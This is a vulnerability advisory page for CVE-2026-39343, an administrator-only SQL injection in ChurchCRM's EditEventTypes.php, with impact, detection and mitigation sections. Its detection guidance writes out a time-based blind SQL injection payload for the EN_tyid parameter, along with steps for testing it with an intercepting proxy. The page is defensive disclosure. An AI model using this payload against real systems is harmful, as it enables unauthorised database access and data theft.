CVE-2026-39343

Received Received - Intake

SQL Injection in ChurchCRM EditEventTypes.php Allows Admin Data Manipulation

Publication date: 2026-04-07

Last updated on: 2026-04-10

Assigner: GitHub, Inc.

Description

ChurchCRM is an open-source church management system. Prior to 7.1.0, a SQL injection vulnerability exists in the EditEventTypes.php file, which is only accessible to administrators. The EN_tyid POST parameter is not sanitized before being used in a SQL query, allowing an administrator to execute arbitrary SQL commands directly against the database. This vulnerability is fixed in 7.1.0.

CVSS Scores

EPSS Scores

Probability:
Percentile:

Meta Information

Published

2026-04-07

Last Modified

2026-04-10

Generated

2026-06-16

AI Q&A

2026-04-07

EPSS Evaluated

2026-06-15

NVD

CVE-2026-39343

EUVD

EUVD-2026-19847

Affected Vendors & Products

Vendor	Product	Version / Range
churchcrm	churchcrm	to 7.1.0 (exc)

Helpful Resources

Exploitability

CWE

KEV

CWE ID	Description
CWE-89	The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.

CWE ID

Description

CWE-89

The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.

Attack-Flow Graph

Compliance Impact

The SQL injection vulnerability in ChurchCRM allows an administrator to execute arbitrary SQL commands, potentially leading to unauthorized access, data exfiltration, and modification of sensitive information stored in the database.

Such unauthorized access and potential data breaches can compromise the confidentiality, integrity, and availability of personal and sensitive data, which are critical requirements under common standards and regulations like GDPR and HIPAA.

Therefore, if exploited, this vulnerability could lead to non-compliance with these regulations due to failure to protect personal data against unauthorized access and disclosure.

Executive Summary

CVE-2026-39343 is a high-severity SQL injection vulnerability in the ChurchCRM application, specifically in the EditEventTypes.php file accessible only to administrators.

The vulnerability occurs because the EN_tyid POST parameter is not sanitized before being used directly in a SQL query, allowing an administrator to inject arbitrary SQL commands.

This means an attacker with administrator access can manipulate the EN_tyid parameter to execute unauthorized SQL queries against the database.

Impact Analysis

This vulnerability allows an attacker with administrator privileges to execute arbitrary SQL commands, which can lead to several serious impacts.

Exfiltration of the entire database, exposing sensitive data.
Bypassing application-level security controls and user interface restrictions.
Modification or deletion of data, affecting data integrity.
Potential escalation of privileges from the database user to the operating system user, possibly leading to full server compromise.
Disruption of service availability.

Detection Guidance

This SQL injection vulnerability can be detected by intercepting and modifying POST requests to the EditEventTypes.php file, specifically the EN_tyid parameter.

A common detection method is to use a proxy tool like Burp Suite to capture the POST request and inject a time-based blind SQL injection payload such as: EN_tyid=1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND '1'='1

If the server response is delayed by the number of seconds specified in the payload (e.g., 5 seconds), it confirms the presence of the SQL injection vulnerability.

Commands or steps to detect this include:

Use a proxy tool (e.g., Burp Suite) to intercept the POST request to EditEventTypes.php.
Modify the EN_tyid POST parameter to include a time-based SQL injection payload.
Observe the server response time for delays indicating successful injection.

Mitigation Strategies

The immediate mitigation step is to upgrade ChurchCRM to version 7.1.0 or later, where this SQL injection vulnerability has been fixed.

Until the upgrade can be performed, restrict administrator access to trusted users only, as exploitation requires administrator privileges.

Additionally, monitor and audit administrator actions and network traffic for suspicious activity involving the EditEventTypes.php endpoint.

Hi! I’m here to help you understand CVE-2026-39343. Ask me anything about the vulnerability, its impact, or mitigation strategies.

0/70

CVE-2026-39343

SQL Injection in ChurchCRM EditEventTypes.php Allows Admin Data Manipulation

Description

CVSS Scores

EPSS Scores

Meta Information

Affected Vendors & Products

Helpful Resources

Exploitability

Attack-Flow Graph

AI Quick Actions

Chat Assistant

EPSS Chart